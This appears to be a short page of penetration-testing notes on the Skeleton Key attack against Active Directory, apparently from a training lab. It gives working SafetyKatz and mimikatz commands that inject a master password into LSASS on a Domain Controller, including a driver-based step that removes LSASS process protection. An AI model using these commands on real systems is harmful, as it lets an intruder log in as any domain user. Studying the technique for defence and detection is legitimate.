Skeleton Key

The Skeleton Key attack allows an attacker to patch the LSASS process on a Domain Controller to accept a single hardcoded "master password" for all domain users. With this backdoor in place, the attacker can authenticate as any user — including privileged accounts — without modifying actual credentials in Active Directory.

Executing this attack requires Domain Admin privileges and direct code injection into LSASS. It is not persistent across reboots and is known to interfere with services like Active Directory Certificate Services (AD CS), potentially causing instability.

# The default password is mimikatz
.\SafetyKatz.exe '"privilege::debug" "misc::skeleton"' -ComputerName dcorp-dc.dollarcop.moneycorp.local

If LSASS is running as a Protected Process Light (PPL) — which is common in hardened environments — standard Skeleton Key injection will fail. In such cases, the attack can still be performed using the Mimikatz driver (mimidriv.sys), which must be placed on disk and loaded on the target DC:

.\mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe /remove" "misc::skeleton" "!-"

This approach temporarily disables protection on LSASS to allow patching, but it is extremely noisy, involving kernel-mode driver installation, which is likely to trigger alerts in modern EDRs and logging systems.

Last updated

Was this helpful?